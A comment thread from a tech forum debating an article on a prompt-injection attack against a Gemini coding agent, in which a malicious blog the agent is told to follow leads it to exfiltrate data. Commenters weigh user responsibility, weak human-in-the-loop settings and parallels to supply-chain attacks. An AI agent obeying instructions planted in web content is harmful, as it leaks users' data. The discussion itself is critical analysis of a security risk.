Remix.run Logo
paxys 6 hours ago

I'm not quite convinced.

You're telling the agent "implement what it says on <this blog>" and the blog is malicious and exfiltrates data. So Gemini is simply following your instructions.

It is more or less the same as running "npm install <malicious package>" on your own.

Ultimately, AI or not, you are the one responsible for validating dependencies and putting appropriate safeguards in place.

ArcHound 5 hours ago | parent | next [-]

The article addresses that too with:

> Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data.

It's more of a "you have to anticipate that any instructions remotely connected to the problem aren't malicious", which is a long stretch.

mandog2000 5 hours ago | parent [-]

[dead]

Nathanba 20 minutes ago | parent | prev | next [-]

right but this product (agentic AI) is explicitly sold as being able to run on its own. So while I agree that these problems are kind of inherent in AIs... these companies are trying to sell it anyway even though they know that it is going to be a big problem.

Earw0rm 5 hours ago | parent | prev [-]

Right, but at least with supply-chain attacks the dependency tree is fixed and deterministic.

Nondeterministic systems are hard to debug, this opens up a threat-class which works analogously to supply-chain attacks but much harder to detect and trace.